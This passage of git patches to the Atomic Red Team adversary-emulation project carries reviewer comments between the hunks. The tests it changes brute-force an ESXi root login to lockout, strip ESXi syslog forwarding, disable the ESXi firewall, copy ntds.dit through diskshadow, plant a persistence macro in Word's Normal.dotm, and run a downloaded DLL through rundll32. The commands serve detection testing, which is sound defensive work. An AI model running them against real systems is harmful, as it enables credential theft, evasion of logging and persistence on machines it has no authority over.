$fileContent\"\n Write-Host \"The file is empty\"\n} + else {\n # Use a regular expression to extract IP addresses\n $ipAddresses + = [regex]::Matches($fileContent, '(udp|tcp):\\/\\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value\n + \ \n $output = \"esxcli system syslog config set --loghost=\" + $ipAddresses\n\n + \ $output | Out-File -FilePath $outputFilePath -Encoding ascii\n \n + \ Write-Host \"IP addresses extracted and saved to $outputFilePath\"\n}\n" + cleanup_command: | + # Re-add the initially extracted IP + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt + + rm c:\temp\loghost_ip.txt + rm c:\temp\loghost.txt + name: powershell + elevation_required: true T1113: technique: modified: '2023-03-30T21:01:39.967Z' 
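Review bot: In the `command` of "ESXi - Remove Syslog remote IP" the plink call that runs `esxi_remove_loghost.txt` executes before the script checks that `c:\temp\loghost.txt` captured anything. If the capture is empty, either because no loghost line matched or because `c:\temp` does not exist (the test never creates it), `loghost_ip.txt` is not written and the cleanup has nothing to restore, leaving the host without remote syslog. Moving the removal call into the `else` branch, after `Out-File` has written the restore command, would make the test fail safe. The dots in the extraction regex are unescaped (`[0-9]{1,3}.[0-9]{1,3}`), so they match any character; `[0-9]{1,3}\.[0-9]{1,3}` is what is meant.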
@@ -67129,6 +67356,46 @@ credential-access: command: "cd \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n.\\kerbrute.exe bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\\bruteuser.txt TestUser1 \n" + - name: ESXi - Brute Force Until Account Lockout + auto_generated_guid: ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5 + description: | + An adversary may attempt to brute force the password of privilleged account for privilege escalation. + In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a) + supported_platforms: + - windows + input_arguments: + vm_host: + description: Specify the host name of the ESXi Server + type: string + default: atomic.local + plink_file: + description: Path to Putty + type: path + default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe + lockout_threshold: + description: Specify the account lockout threshold configured on the ESXI + management server + type: string + default: '5' + dependency_executor_name: powershell + dependencies: + - description: 'The plink executable must be found in the ExternalPayloads folder. + + ' + prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" + executor: + command: | + $lockout_threshold = [int]"#{lockout_threshold}" + for ($var = 1; $var -le $lockout_threshold; $var++) { + #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002 + } + name: powershell + elevation_required: false T1003: technique: x_mitre_platforms: 
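Review bot: The loop in "ESXi - Brute Force Until Account Lockout" calls plink without `-batch`, so a rejected `-pw` value or an uncached host key can make plink fall back to an interactive prompt. An unattended run may then stall on the first iteration instead of producing `lockout_threshold` failed logins. Writing the line as `#{plink_file} -batch -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002` keeps every attempt non-interactive. The account is hard-coded as `-l root` while the other ESXi tests in this file take a `username` input, and there is no `cleanup_command` or note on how the locked account is released. Adding both would let the test be pointed at a disposable account rather than the host's only administrative login.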
@@ -74370,6 +74637,24 @@ credential-access: mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 name: command_prompt elevation_required: true + - name: Create Volume Shadow Copy with diskshadow + auto_generated_guid: b385996c-0e7d-4e27-95a4-aca046b119a7 + description: | + This test is intended to be run on a domain controller + An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit + supported_platforms: + - windows + input_arguments: + filename: + description: Location of the script + type: Path + default: PathToAtomicsFolder\T1003.003\src\diskshadow.txt + executor: + command: | + mkdir c:\exfil + diskshadow.exe /s #{filename} + name: command_prompt + elevation_required: true T1558.003: technique: modified: '2023-03-30T21:01:46.538Z' diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md index 3c27055a35..62ad42f085 100644 --- a/atomics/T1003.003/T1003.003.md +++ b/atomics/T1003.003/T1003.003.md @@ -30,6 +30,8 @@ The following tools and techniques can be used to enumerate the NTDS file and th - [Atomic Test #8 - Create Symlink to Volume Shadow Copy](#atomic-test-8---create-symlink-to-volume-shadow-copy) +- [Atomic Test #9 - Create Volume Shadow Copy with diskshadow](#atomic-test-9---create-volume-shadow-copy-with-diskshadow) +
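Review bot: "Create Volume Shadow Copy with diskshadow" has no `cleanup_command`, although its `command` creates `c:\exfil` and runs a diskshadow script on what the description says should be a domain controller. The script is not shown in this hunk, but if it copies ntds.dit into `c:\exfil` as the description suggests, that copy and the shadow copy remain on the DC after the test. A `cleanup_command` along the lines of `rmdir /s /q c:\exfil`, plus removal of the shadow copy the script created, should be added. `mkdir c:\exfil` will also report an error on a second run because the directory already exists, so guard it with `if not exist c:\exfil mkdir c:\exfil`.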
@@ -425,4 +427,39 @@ mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 +
+
+ +## Atomic Test #9 - Create Volume Shadow Copy with diskshadow +This test is intended to be run on a domain controller +An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit + +**Supported Platforms:** Windows + + +**auto_generated_guid:** b385996c-0e7d-4e27-95a4-aca046b119a7 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| filename | Location of the script | Path | PathToAtomicsFolder\T1003.003\src\diskshadow.txt| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +mkdir c:\exfil +diskshadow.exe /s #{filename} +``` + + + + + +
diff --git a/atomics/T1110.001/T1110.001.md b/atomics/T1110.001/T1110.001.md index 2f047046ec..c66d2dabd8 100644 --- a/atomics/T1110.001/T1110.001.md +++ b/atomics/T1110.001/T1110.001.md @@ -40,7 +40,8 @@ In default environments, LDAP and Kerberos connection attempts are less likely t - [Atomic Test #7 - SUDO Brute Force - FreeBSD](#atomic-test-7---sudo-brute-force---freebsd) -- [Atomic Test #8 - ESXi - Brute Force Until Account Lockout](#atomic-test-8---esxi-brute-force-until-account-lockout) +- [Atomic Test #8 - ESXi - Brute Force Until Account Lockout](#atomic-test-8---esxi---brute-force-until-account-lockout) +
@@ -437,11 +438,11 @@ pkg update && pkg install -y sudo curl bash ## Atomic Test #8 - ESXi - Brute Force Until Account Lockout An adversary may attempt to brute force the password of privilleged account for privilege escalation. In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a) - + **Supported Platforms:** Windows -**auto_generated_guid:** f0b443ae-9565-11ee-b9d1-0242ac120002 +**auto_generated_guid:** ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5 
@@ -450,30 +451,37 @@ In the process, the TA may lock the account, which can be used for detection. [R #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| vm_host | Name or IP of the ESXI host | string | atomic.local | -| plink_file | Path to Putty | path | 'PathToAtomicsFolder\..\atomics\T1110.001\bin\plink.exe' | -| lockout_threshold | Specify the account lockout threshold configured on the ESXI management server | string | 5 | +| vm_host | Specify the host name of the ESXi Server | string | atomic.local| +| plink_file | Path to Putty | path | PathToAtomicsFolder\..\ExternalPayloads\plink.exe| +| lockout_threshold | Specify the account lockout threshold configured on the ESXI management server | string | 5| -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) +#### Attack Commands: Run with `powershell`! ```powershell - $lockout_threshold = [int]"#{lockout_threshold}" - for ($var = 1; $var -le $lockout_threshold; $var++) { - #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002 - } +$lockout_threshold = [int]"#{lockout_threshold}" +for ($var = 1; $var -le $lockout_threshold; $var++) { + #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002 + } ``` + + + #### Dependencies: Run with `powershell`! -##### Description: Check if plink is available. +##### Description: The plink executable must be found in the ExternalPayloads folder. ##### Check Prereq Commands: ```powershell if (Test-Path "#{plink_file}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell - Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" +New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null +Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" ``` -
\ No newline at end of file + + + +
diff --git a/atomics/T1137.001/T1137.001.md b/atomics/T1137.001/T1137.001.md new file mode 100644 index 0000000000..b79376b990 --- /dev/null +++ b/atomics/T1137.001/T1137.001.md @@ -0,0 +1,188 @@ +# T1137.001 - Office Application Startup: Office Template Macros. +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137/001) +
Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template) + +Office Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) + +Word Normal.dotm location:
+C:\Users\<username>\AppData\Roaming\Microsoft\Templates\Normal.dotm + +Excel Personal.xlsb location:
+C:\Users\<username>\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB + +Adversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under C:\Program Files (x86)\Microsoft Office\root\Office16\, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) + +An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.
+ +## Atomic Tests + +- [Atomic Test #1 - Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell](#atomic-test-1---injecting-a-macro-into-the-word-normaldotm-template-for-persistence-via-powershell) + + +
+ +## Atomic Test #1 - Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell +Injects a Macro in the Word default template "Normal.dotm" and makes it execute each time that Word is opened. In this test, the Macro creates a sheduled task to open Calc.exe every evening. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 940db09e-80b6-4dd0-8d4d-7764f89b47a8 + + + + + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +# Registry setting to "Trust access to the VBA project object model" in Word +$registryKey = "HKCU:Software\Microsoft\Office\16.0\Word\Security" +$registryValue = "AccessVBOM" +$registryData = "1" +# The path where a flag text file will be created if Registry setting did not already exist or if it was set to 0 +$flagPath1 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag1.txt" +$flagPath2 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag2.txt" +# Get the value of the Key/Value pair +$value = (Get-ItemProperty -Path $registryKey -Name $registryValue -ErrorAction SilentlyContinue).$registryValue +# Logical operation to: if the value of the key/value is 1, do nothing - +# if the value is 0, change it to 1 and create flag1 - +# if it doesn't exist, create the value and flag2 +if ($value -eq "1") +{ + Write-Host "The registry value '$registryValue' already exists with the required setting." +} + elseif ($value -eq "0") +{ + Write-Host "The registry value was set to 0, temporarily changing to 1." + New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null + echo "flag1" > $flagPath1 +} + else +{ + Write-Host "The registry value '$registryValue' does not exist, temporarily creating it." 
+ New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null + echo "flag2" > $flagPath2 +} +Add-Type -AssemblyName Microsoft.Office.Interop.Word +# Define the path of copied normal template for restoral +$copyPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal1.dotm" +# Define the path to the normal template +$docPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal.dotm" +# Create copy of orginal template for restoral +Copy-Item -Path $docPath -Destination $copyPath -Force +# VBA code to be insterted as a Macro +# Will create a scheduled task to open the Calculator at 8:04pm daily +$vbaCode = @" + Sub AutoExec() + Dim applicationPath As String + Dim taskName As String + Dim runTime As String + Dim schTasksCmd As String + applicationPath = "C:\Windows\System32\calc.exe" + taskName = "OpenCalcTask" + runTime = "20:04" + schTasksCmd = "schtasks /create /tn """ & taskName & """ /tr """ & applicationPath & """ /sc daily /st " & runTime & " /f" + Shell "cmd.exe /c " & schTasksCmd, vbNormalFocus + End Sub +"@ +# Create a new instance of Word.Application +$word = New-Object -ComObject Word.Application +# Keep the Word application hidden +$word.Visible = $false +# Open the document +$document = $word.Documents.Open($docPath) +# Access the VBA project of the document +$vbaProject = $document.VBProject +# Add a new module to the VBA project +$newModule = $vbaProject.VBComponents.Add(1) # 1 = vbext_ct_StdModule +# Add the VBA code to the new module +$newModule.CodeModule.AddFromString($vbaCode) +# Run the Macro +$word.run("AutoExec") +# Save and close the document +$document.SaveAs($docPath) +$document.Close() +# Quit Word +$word.Quit() +# Release COM objects +[System.Runtime.InteropServices.Marshal]::ReleaseComObject($document) | Out-Null +[System.Runtime.InteropServices.Marshal]::ReleaseComObject($word) | Out-Null +[System.Runtime.InteropServices.Marshal]::ReleaseComObject($vbaProject) | 
Out-Null +[System.Runtime.InteropServices.Marshal]::ReleaseComObject($newModule) | Out-Null +``` + +#### Cleanup Commands: +```powershell +# Registry setting to "Trust access to the VBA project object model" in Word +$registryKey = "HKCU:Software\Microsoft\Office\16.0\Word\Security" +$registryValue = "AccessVBOM" +$registryData1 = "1" +$registryData0 = "0" +# Defines the path each flag file created depending on the original registry state +$flagPath1 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag1.txt" +$flagPath2 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag2.txt" +# Define the path of copied normal template for restoral +$copyPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal1.dotm" +# Define the path to the normal template +$docPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal.dotm" +# Delete the scheduled task created by the Macro +schtasks /Delete /TN "OpenCalcTask" /F | Out-Null +#Restore the orginal template if the backup copy exists +if (Test-Path $copyPath) +{ + #Delete the injected template + Remove-Item -Force $docPath -ErrorAction SilentlyContinue + # Restore the original template + Rename-Item -Force -Path $copyPath -NewName $docPath -ErrorAction SilentlyContinue + Write-Host "The original template has been restored" +} + else +{ + Write-Host "The original template is present" +} +#Restore the original state of the registry key +if (Test-Path $flagPath1) +{ + # The value was originally 0, set back to 0 + New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData0 -PropertyType DWORD -Force | Out-Null + Remove-Item -Force $flagPath1 -ErrorAction SilentlyContinue + Write-Host "The original registry state has been restored" +} + elseif (Test-Path $flagPath2) +{ + #The value did not previously exist, delete the value + Remove-ItemProperty -Path $registryKey -Name $registryValue | Out-Null + Remove-Item -Force $flagPath2 -ErrorAction SilentlyContinue | 
Out-Null + Write-Host "The original registry state has been restored" +} + else +{ + # The value was already 1, do nothing + Write-Host "The value $registryValue already existed in $registryKey." +} +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: Microsoft Word must be installed +##### Check Prereq Commands: +```powershell +try { + New-Object -COMObject "Word.Application" | Out-Null + Stop-Process -Name "winword" + exit 0 +} catch { exit 1 } +``` +##### Get Prereq Commands: +```powershell +Write-Host "You will need to install Microsoft Word manually to meet this requirement" +``` + + + + +
diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md index 99d236c7c2..416e9b73d5 100644 --- a/atomics/T1218.011/T1218.011.md +++ b/atomics/T1218.011/T1218.011.md @@ -38,6 +38,8 @@ Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techni - [Atomic Test #13 - Rundll32 with desk.cpl](#atomic-test-13---rundll32-with-deskcpl) +- [Atomic Test #14 - Running DLL with .init extension and function](#atomic-test-14---running-dll-with-init-extension-and-function) +
@@ -590,4 +592,52 @@ del not_an_scr.scr +
+
+ +## Atomic Test #14 - Running DLL with .init extension and function +This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up. +DLL created with the AtomicTestHarnesses Portable Executable Builder script. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 2d5029f0-ae20-446f-8811-e7511b58e8b6 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| dll_file | The DLL file to be called | string | PathToAtomicsFolder\T1218.011\bin\_WT.init| +| dll_url | The URL to the DLL file that must be downloaded | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +rundll32.exe #{dll_file},krnl +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The DLL file to be called must exist at the specified location (#{dll_file}) +##### Check Prereq Commands: +```powershell +if (Test-Path "#{dll_file}") {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null +Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}" +``` + + + +
diff --git a/atomics/T1560.001/T1560.001.md b/atomics/T1560.001/T1560.001.md index 67ad62df49..1296d23a91 100644 --- a/atomics/T1560.001/T1560.001.md +++ b/atomics/T1560.001/T1560.001.md @@ -28,7 +28,8 @@ Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZi - [Atomic Test #9 - Encrypts collected data with AES-256 and Base64](#atomic-test-9---encrypts-collected-data-with-aes-256-and-base64) -- [Atomic Test #10 - ESXi - Remove Syslog remote IP](#atomic-test-10---esxi-remove-syslog-remote-ip) +- [Atomic Test #10 - ESXi - Remove Syslog remote IP](#atomic-test-10---esxi---remove-syslog-remote-ip) +
@@ -506,12 +507,12 @@ if [ ! -d #{input_folder} ]; then mkdir -p #{input_folder}; cd #{input_folder};
## Atomic Test #10 - ESXi - Remove Syslog remote IP - An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM. +An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM. **Supported Platforms:** Windows -**auto_generated_guid:** 8241dda4-962e-11ee-b9d1-0242ac120002 +**auto_generated_guid:** 36c62584-d360-41d6-886f-d194654be7c2 
@@ -520,65 +521,67 @@ if [ ! -d #{input_folder} ]; then mkdir -p #{input_folder}; cd #{input_folder}; #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| vm_host | Name or IP of the ESXI host | string | atomic.local | -| plink_file | Path to Putty | path | 'PathToAtomicsFolder\..\atomics\T1560.001\bin\plink.exe' | -| username | Username used to log into ESXi | string | root | -| password | Password used to log into ESXI | string | n/a | +| vm_host | Specify the host name of the ESXi Server | string | atomic.local| +| plink_file | Path to Putty | path | PathToAtomicsFolder\..\ExternalPayloads\plink.exe| +| username | Username used to log into ESXi | string | root| +| password | password used to log into ESXI | string | n/a| + -#### Attack Commands: Run with `powershell`! +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell - # Extract line with IP address from the syslog configuration output - #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_get_loghost.txt | findstr /r "[0-9]*\.[0-9]*\.[0-9]*\." 
> c:\temp\loghost.txt - - # Replace the IP with "0" - #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_remove_loghost.txt - - # Extract the IP from the line extracted from findstr - $inputFilePath = "c:\temp\loghost.txt" - $outputFilePath = "c:\temp\loghost_ip.txt" - - $fileContent = Get-Content -Path $inputFilePath -Raw - - if ([string]::IsNullOrWhiteSpace($fileContent)) { - Write-Host "The content is $fileContent" - Write-Host "The file is empty" - } else { - # Use a regular expression to extract IP addresses - $ipAddresses = [regex]::Matches($fileContent, '(udp|tcp):\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value - - $output = "esxcli system syslog config set --loghost=" + $ipAddresses - - $output | Out-File -FilePath $outputFilePath -Encoding ascii - - Write-Host "IP addresses extracted and saved to $outputFilePath" +# Extract line with IP address from the syslog configuration output +#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_get_loghost.txt | findstr /r "[0-9]*\.[0-9]*\.[0-9]*\." 
> c:\temp\loghost.txt + +# Replace the IP with "0" +#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_remove_loghost.txt + +# Extract the IP from the line extracted from findstr +$inputFilePath = "c:\temp\loghost.txt" +$outputFilePath = "c:\temp\loghost_ip.txt" + +$fileContent = Get-Content -Path $inputFilePath -Raw + +if ([string]::IsNullOrWhiteSpace($fileContent)) { + Write-Host "The content is $fileContent" + Write-Host "The file is empty" +} else { + # Use a regular expression to extract IP addresses + $ipAddresses = [regex]::Matches($fileContent, '(udp|tcp):\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value + + $output = "esxcli system syslog config set --loghost=" + $ipAddresses + + $output | Out-File -FilePath $outputFilePath -Encoding ascii + + Write-Host "IP addresses extracted and saved to $outputFilePath" } ``` #### Cleanup Commands: ```powershell - # Re-add the initially extracted IP - #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt - - rm c:\temp\loghost_ip.txt - rm c:\temp\loghost.txt +# Re-add the initially extracted IP +#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt + +rm c:\temp\loghost_ip.txt +rm c:\temp\loghost.txt ``` #### Dependencies: Run with `powershell`! -##### Description: Check if plink is available. +##### Description: The plink executable must be found in the ExternalPayloads folder. ##### Check Prereq Commands: ```powershell if (Test-Path "#{plink_file}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell - Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" +New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null +Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" ``` -
\ No newline at end of file +
diff --git a/atomics/T1562.004/T1562.004.md b/atomics/T1562.004/T1562.004.md index 8196b11c2c..4916c495ff 100644 --- a/atomics/T1562.004/T1562.004.md +++ b/atomics/T1562.004/T1562.004.md @@ -50,7 +50,8 @@ Modifying or disabling a system firewall may enable adversary C2 communications, - [Atomic Test #22 - Blackbit - Disable Windows Firewall using netsh firewall](#atomic-test-22---blackbit---disable-windows-firewall-using-netsh-firewall) -- [Atomic Test #23 - ESXi - Disable Firewall via Esxcli](#atomic-test-23---esxi-disable-firewall-via-esxcli) +- [Atomic Test #23 - ESXi - Disable Firewall via Esxcli](#atomic-test-23---esxi---disable-firewall-via-esxcli) +
@@ -972,12 +973,12 @@ netsh firewall set opmode mode=enable >nul 2>&1
## Atomic Test #23 - ESXi - Disable Firewall via Esxcli - Adversaries may disable the ESXI firewall via ESXCLI +Adversaries may disable the ESXI firewall via ESXCLI **Supported Platforms:** Windows -**auto_generated_guid:** 8710d396-96e5-11ee-b9d1-0242ac120002 +**auto_generated_guid:** bac8a340-be64-4491-a0cc-0985cb227f5a 
@@ -986,34 +987,39 @@ netsh firewall set opmode mode=enable >nul 2>&1 #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| vm_host | Name or IP of the ESXI host | string | atomic.local | -| plink_file | Path to Putty | path | 'PathToAtomicsFolder\..\atomics\T1562.004\bin\plink.exe' | -| username | Username used to log into ESXi | string | root | -| password | Password used to log into ESXI | string | n/a | +| vm_host | Specify the host name of the ESXi Server | string | atomic.local| +| plink_file | Path to Putty | path | PathToAtomicsFolder\..\ExternalPayloads\plink.exe| +| username | username used to log into ESXi | string | root| +| password | password used to log into ESXI | string | n/a| + -#### Attack Commands: Run with `powershell`! +#### Attack Commands: Run with `command_prompt`! ```cmd - #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt +#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt ``` #### Cleanup Commands: ```cmd - #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt +#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt ``` #### Dependencies: Run with `powershell`! -##### Description: Check if plink is available. +##### Description: The plink executable must be found in the ExternalPayloads folder. 
##### Check Prereq Commands: ```powershell if (Test-Path "#{plink_file}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell - Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" +New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null +Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" ``` -
\ No newline at end of file + + + +
From 097661445e79799d61e5344550569d88e7fe2b9c Mon Sep 17 00:00:00 2001 From: Hare Sudhan Date: Sat, 24 Feb 2024 20:17:21 -0500 Subject: [PATCH 19/41] Dependabot update (#2697) * dependabot update * updating atomics count in README.md [ci skip] --------- Co-authored-by: publish bot Co-authored-by: Carrie Roberts --- .github/dependabot.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/.github/dependabot.yml b/.github/dependabot.yml index 91abb11fdf..0c71429862 100644 --- a/.github/dependabot.yml +++ b/.github/dependabot.yml @@ -9,3 +9,8 @@ updates: directory: "/" # Location of package manifests schedule: interval: "weekly" + # Maintain dependencies for GitHub Actions + - package-ecosystem: "github-actions" + directory: "/" + schedule: + interval: "weekly" From 76a970dd843e21b8590bda33fd123e2d89249127 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Sat, 24 Feb 2024 18:20:10 -0700 Subject: [PATCH 20/41] Bump actions/setup-python from 4 to 5 (#2702) Bumps [actions/setup-python](https://github.com/actions/setup-python) from 4 to 5. - [Release notes](https://github.com/actions/setup-python/releases) - [Commits](https://github.com/actions/setup-python/compare/v4...v5) --- updated-dependencies: - dependency-name: actions/setup-python dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- .github/workflows/generate-counter.yml | 2 +- .github/workflows/validate-atomics.yml | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/generate-counter.yml b/.github/workflows/generate-counter.yml index 48ffa3eef0..f9d0d9b8dc 100644 --- a/.github/workflows/generate-counter.yml +++ b/.github/workflows/generate-counter.yml 
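Review bot: Enabling `package-ecosystem: "github-actions"` does not by itself make the action references immutable. The workflows bumped later in this series still use major-version tags such as `actions/checkout@v4`, including in jobs that pass `secrets.PROTECTED_BRANCH_PUSH_TOKEN`. A tag can be re-pointed by whoever controls the action's repository, so those jobs run whatever the tag resolves to at run time. With this ecosystem now covered, each `uses:` could be pinned to a full commit SHA with the version in a trailing comment, e.g. `uses: actions/checkout@<full-commit-sha> # v4` (placeholder, not a real hash). Dependabot keeps SHA pins updated too, so the pin adds little maintenance.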
@@ -13,7 +13,7 @@ jobs: token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }} - name: Install poetry run: pipx install poetry - - uses: actions/setup-python@v4 + - uses: actions/setup-python@v5 with: python-version: '3.11.2' cache: 'poetry' diff --git a/.github/workflows/validate-atomics.yml b/.github/workflows/validate-atomics.yml index c43fd7bc77..a3950021b3 100644 --- a/.github/workflows/validate-atomics.yml +++ b/.github/workflows/validate-atomics.yml @@ -14,7 +14,7 @@ jobs: - name: Install poetry run: pipx install poetry - name: setup python3.11 - uses: actions/setup-python@v4 + uses: actions/setup-python@v5 id: setup-python with: python-version: "3.11.2" @@ -46,7 +46,7 @@ jobs: - name: Install poetry run: pipx install poetry - name: setup python3.11 - uses: actions/setup-python@v4 + uses: actions/setup-python@v5 id: setup-python with: python-version: "3.11.2" From 7ef6a1ae5b4ba50ab47db83d68ffc5df5fc0d0af Mon Sep 17 00:00:00 2001 From: publish bot Date: Sun, 25 Feb 2024 01:20:54 +0000 Subject: [PATCH 21/41] updating atomics count in README.md [ci skip] 